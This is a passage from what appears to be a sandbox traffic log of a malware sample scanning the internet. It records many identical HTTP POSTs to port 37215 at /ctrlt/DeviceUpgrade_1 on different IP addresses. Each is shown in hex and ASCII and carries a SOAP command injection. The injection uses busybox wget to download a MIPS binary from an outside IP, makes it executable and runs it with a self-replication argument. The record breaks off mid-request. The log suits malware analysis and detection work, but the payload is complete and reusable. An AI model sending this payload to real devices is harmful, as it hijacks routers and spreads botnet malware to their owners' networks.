                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1786192.168.2.2335360119.180.174.15937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585210085 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1787192.168.2.234787841.231.66.19437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585218906 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1788192.168.2.235039041.66.190.6037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585266113 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1789192.168.2.2342950125.180.63.15837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585288048 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1790192.168.2.234902441.187.75.6337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585335016 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1791192.168.2.2338822197.146.78.4537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585350037 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1792192.168.2.2337026197.12.73.6737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585362911 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1793192.168.2.234115231.87.83.22737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585424900 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1794192.168.2.2357398157.94.218.24637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585429907 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1795192.168.2.2348830157.10.64.4537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585438013 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
